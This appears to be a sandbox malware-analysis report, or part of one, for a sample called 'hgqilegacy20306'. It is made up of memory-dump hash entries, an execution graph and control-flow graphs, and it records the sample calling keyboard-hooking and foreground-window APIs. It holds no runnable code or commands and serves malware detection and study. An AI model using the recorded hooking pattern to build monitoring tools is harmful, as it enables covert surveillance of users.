                                                • Opcode Fuzzy Hash: 98819f2710137ad745d3b72e64e04f0857a014cbc8baa92cc33074b5694fbf9e
                                                • Instruction Fuzzy Hash: 28514CB4E102598FDB14CFA9C5805AEFBF2BF89300F24856AD408AB356DB319D42CF60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 875e4537872690b39f0af522b6efa15624bb81f956e6504ac839b42f2aac0a7a
                                                • Instruction ID: 15dda1f8445f43554b5d9e18f00f13f2a37f63ec671750ad0f914f444f7b460b
                                                • Opcode Fuzzy Hash: 875e4537872690b39f0af522b6efa15624bb81f956e6504ac839b42f2aac0a7a
                                                • Instruction Fuzzy Hash: ACF01CB5D6A244CFCF109F94E8446F8B7BCEB4B311F123091D00E976A2C3B059A99E00
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abdd87aee3ca8e8bd63cde544152c0c11651457dc5e9e83af10b72aeed93db91
                                                • Instruction ID: 30cf827c8567575ff1080f39f23682a0b6c94e8d4d830f34211da29903778a85
                                                • Opcode Fuzzy Hash: abdd87aee3ca8e8bd63cde544152c0c11651457dc5e9e83af10b72aeed93db91
                                                • Instruction Fuzzy Hash: 0DE0BF75D6A004CBCF105FA4A4042F8B7B8EB4B312F5520A1D50DD7561D37049655F54
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2eafe81553920e350a38d8fb7401ee40ac90970ad13f69501701a33ba9bf2bcd
                                                • Instruction ID: 62ec9ddbb127cbb498e82ad3135e584c238aec2a1b06b30b8cbfb563cedbed81
                                                • Opcode Fuzzy Hash: 2eafe81553920e350a38d8fb7401ee40ac90970ad13f69501701a33ba9bf2bcd
                                                • Instruction Fuzzy Hash: 8FD01761D6F2D0DECF024B6864180F9BF389E8B216F5A20E7D04ADB0A3C291916C8745

                                                Execution Graph

                                                Execution Coverage:6.6%
                                                Dynamic/Decrypted Code Coverage:80%
                                                Signature Coverage:0%
                                                Total number of Nodes:60
                                                Total number of Limit Nodes:0
                                                execution_graph 36267 255390 36268 25539c 36267->36268 36278 258ec4 36268->36278 36271 255775 36300 569320 36271->36300 36306 569314 36271->36306 36272 255aa8 36279 258ec7 36278->36279 36280 25543b 36279->36280 36312 25dd41 36279->36312 36316 25e133 36279->36316 36320 25dd50 36279->36320 36288 5f82b0 36280->36288 36281 258fbe 36281->36280 36282 259043 KiUserExceptionDispatcher 36281->36282 36324 672c73 36281->36324 36328 672ad8 36281->36328 36282->36281 36289 5f82d2 36288->36289 36290 255664 36289->36290 36291 25dd41 LdrInitializeThunk 36289->36291 36292 25dd50 LdrInitializeThunk 36289->36292 36293 25e133 LdrInitializeThunk 36289->36293 36294 613e68 36290->36294 36291->36290 36292->36290 36293->36290 36295 613e84 36294->36295 36296 613f2f 36295->36296 36297 25dd41 LdrInitializeThunk 36295->36297 36298 25dd50 LdrInitializeThunk 36295->36298 36299 25e133 LdrInitializeThunk 36295->36299 36296->36271 36297->36296 36298->36296 36299->36296 36301 56933c 36300->36301 36302 5693e7 36301->36302 36303 25dd41 LdrInitializeThunk 36301->36303 36304 25dd50 LdrInitializeThunk 36301->36304 36305 25e133 LdrInitializeThunk 36301->36305 36302->36272 36303->36302 36304->36302 36305->36302 36307 569320 36306->36307 36308 5693e7 36307->36308 36309 25dd41 LdrInitializeThunk 36307->36309 36310 25dd50 LdrInitializeThunk 36307->36310 36311 25e133 LdrInitializeThunk 36307->36311 36308->36272 36309->36308 36310->36308 36311->36308 36315 25dd48 36312->36315 36313 25dee1 36313->36281 36314 25e270 LdrInitializeThunk 36314->36313 36315->36313 36315->36314 36319 25dfeb LdrInitializeThunk 36316->36319 36318 25e288 36318->36281 36319->36318 36323 25dd81 36320->36323 36321 25dee1 36321->36281 36322 25e270 LdrInitializeThunk 36322->36321 36323->36321 36323->36322 36325 672b37 36324->36325 36326 672c1b 36325->36326 36327 672c2a LdrInitializeThunk 36325->36327 36326->36281 36327->36326 36331 672aff 36328->36331 36329 672c2a LdrInitializeThunk 36330 672c1b 36329->36330 36330->36281 36331->36329 36331->36330 36332 6e7318 36333 6e7360 SetWindowsHookExA 36332->36333 36335 6e73db 36333->36335 36336 6e75a0 36338 6e75c4 36336->36338 36339 6e6b84 36338->36339 36340 6e76b0 GetForegroundWindow 36339->36340 36342 6e7732 36340->36342 36342->36338
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N
                                                • API String ID: 0-1130791706
                                                • Opcode ID: 31cf88fdb91aacad9e981707dcb58b86c91e016b73c8a5dda49282f689dd3737
                                                • Instruction ID: eb42af328bf177a92f797251e8a355b4bdd0d3e3f99322f2d1d898e6dc77edb3
                                                • Opcode Fuzzy Hash: 31cf88fdb91aacad9e981707dcb58b86c91e016b73c8a5dda49282f689dd3737
                                                • Instruction Fuzzy Hash: D682C331D1075A8ADB11EF68C8846EDF7B1FF9A300F50C69AE44976221EB70AAD5CF41

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1915 25dd50-25dd7f 1916 25dd86-25de1c 1915->1916 1917 25dd81 1915->1917 1919 25debb-25dec1 1916->1919 1917->1916 1920 25dec7-25dedf 1919->1920 1921 25de21-25de34 1919->1921 1924 25dee1-25deee 1920->1924 1925 25def3-25df06 1920->1925 1922 25de36 1921->1922 1923 25de3b-25de45 1921->1923 1922->1923 1929 25de4c-25de8c 1923->1929 1926 25e288-25e384 1924->1926 1927 25df0d-25df29 1925->1927 1928 25df08 1925->1928 1933 25e386-25e38b 1926->1933 1934 25e38c-25e396 1926->1934 1930 25df30-25df54 1927->1930 1931 25df2b 1927->1931 1928->1927 1942 25de9f-25deb1 1929->1942 1943 25de8e-25de9c 1929->1943 1938 25df56 1930->1938 1939 25df5b-25df8d 1930->1939 1931->1930 1933->1934 1938->1939 1947 25df94-25dfd6 1939->1947 1948 25df8f 1939->1948 1944 25deb3 1942->1944 1945 25deb8 1942->1945 1943->1920 1944->1945 1945->1919 1950 25dfdd-25dfe6 1947->1950 1951 25dfd8 1947->1951 1948->1947 1952 25e20d-25e213 1950->1952 1951->1950 1953 25e219-25e22c 1952->1953 1954 25dfeb-25e010 1952->1954 1955 25e233-25e24e 1953->1955 1956 25e22e 1953->1956 1957 25e017-25e04d 1954->1957 1958 25e012 1954->1958 1959 25e255-25e269 1955->1959 1960 25e250 1955->1960 1956->1955 1966 25e054-25e086 1957->1966 1967 25e04f 1957->1967 1958->1957 1964 25e270-25e286 LdrInitializeThunk 1959->1964 1965 25e26b 1959->1965 1960->1959 1964->1926 1965->1964 1969 25e088-25e0ad 1966->1969 1970 25e0ea-25e0fd 1966->1970 1967->1966 1973 25e0b4-25e0e2 1969->1973 1974 25e0af 1969->1974 1971 25e104-25e129 1970->1971 1972 25e0ff 1970->1972 1977 25e138-25e170 1971->1977 1978 25e12b-25e12c 1971->1978 1972->1971 1973->1970 1974->1973 1979 25e177-25e1d8 1977->1979 1980 25e172 1977->1980 1978->1953 1985 25e1df-25e203 1979->1985 1986 25e1da 1979->1986 1980->1979 1989 25e205 1985->1989 1990 25e20a 1985->1990 1986->1985 1989->1990 1990->1952
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22b1037c70887175bfecdb5c11cf88628469c0a96498085f460b02451e8fe621
                                                • Instruction ID: 913d44c2142387a03b25900be2a57ca0fcb62d615b60a7c4d4ee49fd2ea7a58b
                                                • Opcode Fuzzy Hash: 22b1037c70887175bfecdb5c11cf88628469c0a96498085f460b02451e8fe621
                                                • Instruction Fuzzy Hash: EBF1F574D10228CFDB58DFA8C884B9DBBB2BF88305F5585A9D808AB355DB709E85CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2404 258ec4-258ec5 2405 258ec7-258ef0 2404->2405 2406 258f00-258f88 2404->2406 2407 258ef7-258efe 2405->2407 2408 258ef2 2405->2408 2412 258f8e-258f9e 2406->2412 2413 2592da-25930c 2406->2413 2407->2406 2408->2407 2463 258fa1 call 259330 2412->2463 2464 258fa1 call 259672 2412->2464 2416 258fa7-258fb6 2465 258fb8 call 25dd41 2416->2465 2466 258fb8 call 25dd50 2416->2466 2467 258fb8 call 25e133 2416->2467 2417 258fbe-258fda 2419 258fe1-258fea 2417->2419 2420 258fdc 2417->2420 2421 2592cd-2592d3 2419->2421 2420->2419 2422 258fef-258ffb 2421->2422 2423 2592d9 2421->2423 2461 258ffd call 672c73 2422->2461 2462 258ffd call 672ad8 2422->2462 2423->2413 2424 259003-259069 KiUserExceptionDispatcher 2427 259125-259180 2424->2427 2428 25906f-2590dd call 253858 2424->2428 2440 259181-2591cf 2427->2440 2438 259120-259123 2428->2438 2439 2590df-25911f 2428->2439 2438->2440 2439->2438 2445 2591d5-2592b7 2440->2445 2446 2592b8-2592c3 2440->2446 2445->2446 2448 2592c5 2446->2448 2449 2592ca 2446->2449 2448->2449 2449->2421 2461->2424 2462->2424 2463->2416 2464->2416 2465->2417 2466->2417 2467->2417
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 00259055
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 692178b54be07c7aac45a9f5ea95b28b415536ab051959c3a627734b7853cafb
                                                • Instruction ID: 0818b35235ce978ef7cf7cae2aca6141c325c2f66ab2bfa245a633108d626ba1
                                                • Opcode Fuzzy Hash: 692178b54be07c7aac45a9f5ea95b28b415536ab051959c3a627734b7853cafb
                                                • Instruction Fuzzy Hash: 06D1E574E00218CFDB18DFA5C954B9DBBB2BF89301F2091A9D809AB365DB349E85CF10
                                                APIs
                                                • SetWindowsHookExA.USER32(?,?,?,?), ref: 006E73C9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 35f33b6a605d55c28c81934867b981d24e4be2f90784a6eb53fdcd9743ddd7fe
                                                • Instruction ID: c0a03c7608526d62f1932d3835bdee857a4aff6866427894ccc795c5ef031eb9
                                                • Opcode Fuzzy Hash: 35f33b6a605d55c28c81934867b981d24e4be2f90784a6eb53fdcd9743ddd7fe
                                                • Instruction Fuzzy Hash: 2C4188B8D052589FCF10CFAAD884AEEFBB1BB49310F24942AE815B7350D774A945CF54
                                                APIs
                                                • SetWindowsHookExA.USER32(?,?,?,?), ref: 006E73C9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: c37e454b87ff85ef50965443f181125a74f82582b82a46dfad22d012111d7e71
                                                • Instruction ID: f9140b44d8ab786a7b4e552ffeddf0c8d7083f80d355f44bb3746cc340f69056
                                                • Opcode Fuzzy Hash: c37e454b87ff85ef50965443f181125a74f82582b82a46dfad22d012111d7e71
                                                • Instruction Fuzzy Hash: 654197B4D052589FCF10CFAAD884AEEFBB1BB49310F20A42AE814B7310D734A945CF54
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916766623.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_5f0000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fda64bc92d03d358052a76b0b39c3d6a3fe371ea48c210366b1e0575debd6a0c
                                                • Instruction ID: 50eb35f5eeab542044c4666c3f606476897cd053482086239c3c9c30aaf5968c
                                                • Opcode Fuzzy Hash: fda64bc92d03d358052a76b0b39c3d6a3fe371ea48c210366b1e0575debd6a0c
                                                • Instruction Fuzzy Hash: 9AD1B274E002188FDB54DFA5C894BADBBB2FF89300F2491A9D509AB358DB359E81CF50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916782898.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_610000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea10a09d00a2d625ba98037579bf8e73f3c5cd6a53bff1cee6d401f8cd6ffe26
                                                • Instruction ID: cbc87dcc415e59a43ef2660bde55895309638cf740537c53d737312a64df211b
                                                • Opcode Fuzzy Hash: ea10a09d00a2d625ba98037579bf8e73f3c5cd6a53bff1cee6d401f8cd6ffe26
                                                • Instruction Fuzzy Hash: 2481C274E00218CFDB18DFA9C891BADBBB2BF88304F249129D815AB398DB355D46CF54
                                                APIs
                                                • LdrInitializeThunk.NTDLL(000000FF), ref: 00672C3A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916806771.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_670000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f6143fb2cceee6fd6dcb06603d80286c6b64cb6c6f9370716d0559dccc994827
                                                • Instruction ID: e69617c34390dd38cf20fe05cd647507584e290ebac3b3b09209cbda583eb3e1
                                                • Opcode Fuzzy Hash: f6143fb2cceee6fd6dcb06603d80286c6b64cb6c6f9370716d0559dccc994827
                                                • Instruction Fuzzy Hash: 455136B4D00219CFDB18CFAAD8846DDBBB2BF88314F20C52AE418BB294D7744946CF50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916806771.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_670000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7bceb6cf1db8c5720e1f2bd5686e07f213de6bbd02448ea15fe0e0409939f5e
                                                • Instruction ID: 5855c360e62c6160edc93e7870512602403622862ae4c9341616aebd4a7c6e5f
                                                • Opcode Fuzzy Hash: c7bceb6cf1db8c5720e1f2bd5686e07f213de6bbd02448ea15fe0e0409939f5e
                                                • Instruction Fuzzy Hash: 565110B4D0020ACFCB24CFA8D4986DDBBB2BF59314F20952AE419BB294D3349986CF10
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 006E7720
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: ForegroundWindow
                                                • String ID:
                                                • API String ID: 2020703349-0
                                                • Opcode ID: b6a319e151f05496095ea51456f505191e362d462df5ac47048559c4ec147964
                                                • Instruction ID: ed019516425159cea8e756136b354f32fb46bc6024d37a3250a42a237ab6e9c0
                                                • Opcode Fuzzy Hash: b6a319e151f05496095ea51456f505191e362d462df5ac47048559c4ec147964
                                                • Instruction Fuzzy Hash: 9121BCB9D042589FCB10CFAAD984ADEFBF4EB49310F24905AE814B7310D374A945CFA5
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 006E7720
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: ForegroundWindow
                                                • String ID:
                                                • API String ID: 2020703349-0
                                                • Opcode ID: 41762b8645bb00dccc385fd7510b75da5072a14d2d3a09e4e16ebaab14914395
                                                • Instruction ID: dc9fa1201867a6d251a164460ff5b5862e090eeeed05f2b17810401ef67ab1d1
                                                • Opcode Fuzzy Hash: 41762b8645bb00dccc385fd7510b75da5072a14d2d3a09e4e16ebaab14914395
                                                • Instruction Fuzzy Hash: D4219EB4D052589FCF10CF9AD584ADEBBF4EB49314F24905AE814B7310D375A945CFA4
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 0025E275
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3950d7327043e6a0be120badf075a34973938d3553c843bd4ca123311ce18573
                                                • Instruction ID: deccd14e218b07554dc4685cea3f867904e434ef3362a4635142866a720774c5
                                                • Opcode Fuzzy Hash: 3950d7327043e6a0be120badf075a34973938d3553c843bd4ca123311ce18573
                                                • Instruction Fuzzy Hash: DA11AF74E101199FDF08CFA8C8C4AACBBB9FB88305F658555EC14E7245D7309E09CB14
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916782898.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_610000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d5d8e5892902d856d7bf500f819ee87c4beaa04d01d4fea0bd4a364b29274b7
                                                • Instruction ID: 31081be3f6909151a27092f3159d9951cb35af60440dee6dbcf1e54f413f1ea7
                                                • Opcode Fuzzy Hash: 7d5d8e5892902d856d7bf500f819ee87c4beaa04d01d4fea0bd4a364b29274b7
                                                • Instruction Fuzzy Hash: 5871F274E00218CFDB18DFA5C891AEDBBB2BF88300F249129D809AB359DB359D46CF54
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916748713.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_560000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffbdeefc664b83ae1113d1fa22483b7e98b7e7202325101a21348f8bf25a596c
                                                • Instruction ID: fb09442d3e770f460ac0a8e146dde8e454137a431051c268f013c17fb87c8b14
                                                • Opcode Fuzzy Hash: ffbdeefc664b83ae1113d1fa22483b7e98b7e7202325101a21348f8bf25a596c
                                                • Instruction Fuzzy Hash: 45710474E00218CFDB18DFA9C991AEDBBB2BF88300F249529D405AB359DB359D46CF50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916748713.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_560000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 278362b145f8035929a215985ae6e239e4300f3a8a377147cc4b82013986d448
                                                • Instruction ID: d414e36aebd7ebea558a59453e648941dfad0228728cbcd39a22ca7cdf2c7c4d
                                                • Opcode Fuzzy Hash: 278362b145f8035929a215985ae6e239e4300f3a8a377147cc4b82013986d448
                                                • Instruction Fuzzy Hash: 6071F374E00218CFDB18DFA9C991AADBBB2BF89300F249529D415BB399DB359D42CF50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916782898.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_610000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04fd4b099f127267bb51f94a9db0fcc0803be7732263a648e93f38f944abb287
                                                • Instruction ID: 9c6f06a2f58e89f9b6aa77f275887dfcddf435e183a40af7d7e54fd02bb5e951
                                                • Opcode Fuzzy Hash: 04fd4b099f127267bb51f94a9db0fcc0803be7732263a648e93f38f944abb287
                                                • Instruction Fuzzy Hash: 8531E074E012088BDB48DFEAC8546EEBBF2BF89300F14D12AD419AB259EB744946CF55
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916748713.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_560000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a97e3274ffb545cf512d7bdffeff9f09e17c0502077572ca459f0c0fdd988c9d
                                                • Instruction ID: 112144f91a6b138009df277eeda9bc5a02b5048a20069ba88ad115b1814ebbea
                                                • Opcode Fuzzy Hash: a97e3274ffb545cf512d7bdffeff9f09e17c0502077572ca459f0c0fdd988c9d
                                                • Instruction Fuzzy Hash: E231E074E002088BDB08DFAAC9546EEBBF2BF89300F24D42AD419AB255EB345946CF54
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f13b513ed56659d129482a0d2af91e69ea718c8db5e4e18bac66f5a924dcd70
                                                • Instruction ID: 9e21e4f95f53b6f6e2175c269e8f4f9cba5d7995395492b2a5476be1849135d0
                                                • Opcode Fuzzy Hash: 9f13b513ed56659d129482a0d2af91e69ea718c8db5e4e18bac66f5a924dcd70
                                                • Instruction Fuzzy Hash: 552125B1904240EFDB11CF64D8C0B2ABFA1FB89314F24C56AE80A0B646C336D856CBA1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c512f6542b75752026bcc7c7ebee0a5aa63adf74f83136c5023205d5228ae7a5
                                                • Instruction ID: 573a798398b19edb91c2688f43cb1ddf8b7e2dbe8f2e6ef5fb82b1ec3581c3b3
                                                • Opcode Fuzzy Hash: c512f6542b75752026bcc7c7ebee0a5aa63adf74f83136c5023205d5228ae7a5
                                                • Instruction Fuzzy Hash: 722104B1614244EFDB21DF24D8C4B66FBA1FB84314F34C9AAE8494B246D73AD846CB61
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6f1873334ec22b37ada6fe7344f76283a7ab01954d68674444807df4ce0aa78
                                                • Instruction ID: 837e536989eb25ffecb997aa6f195dfaa2320ee2c40cce8ffd6d0cb38beb7269
                                                • Opcode Fuzzy Hash: b6f1873334ec22b37ada6fe7344f76283a7ab01954d68674444807df4ce0aa78
                                                • Instruction Fuzzy Hash: DA21D475604340EFDB15CF14D8C0B66FBA5EB84714F24C9AAE8494B246D736E846CBA1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                • Instruction ID: 48f15d2fdbb0dd5e16a182d9b4b8ffd0fe30a6382a853623d77bf5470d1a4209
                                                • Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                • Instruction Fuzzy Hash: F411D376904280CFDB12CF54D9C4B56BFB1FB85314F24C6AAD8094B656C336D85ACBA2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 580c522b5ef90b98862f82f98c40a52113c760df7ac53a49ff79566927aa3c38
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 12119D75504280DFDB02CF14D5C4B55FFA1FB85314F28C6AED8494B656C33AE84ACBA1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 432d93f8f86c2d0e6069f7baff076e5d8f2beae8b5e889268f33bb3bec877eaa
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 26118B75504284DFDB12CF14D9C4B55FFA1FB84314F28CAAAD8494B656C33AD84ACFA2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53027816b571be511fe5db298b55ca593b1a6d3fd595ea86e98811f51730ed09
                                                • Instruction ID: dbc704d3ca4038276b9915b5282f2b0eabee19ebdfd0131831249ebf5c6e64dc
                                                • Opcode Fuzzy Hash: 53027816b571be511fe5db298b55ca593b1a6d3fd595ea86e98811f51730ed09
                                                • Instruction Fuzzy Hash: 58F049B6200604AF93248F0AC884C27FBADEBC5770719C59AEC4A4B612C671EC42CBA0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80baed75f08881b1d2afba685240ce088484f97126b05f565220feba4fa261a6
                                                • Instruction ID: 7135b35cda0e4c39cbfd99a090209e191bdf4d8062f15d4f60185dc8683d6dae
                                                • Opcode Fuzzy Hash: 80baed75f08881b1d2afba685240ce088484f97126b05f565220feba4fa261a6
                                                • Instruction Fuzzy Hash: ADF0F975100640AFD3258F06C884D63BBB9EB857607198589A85A5B712C674FC42CB60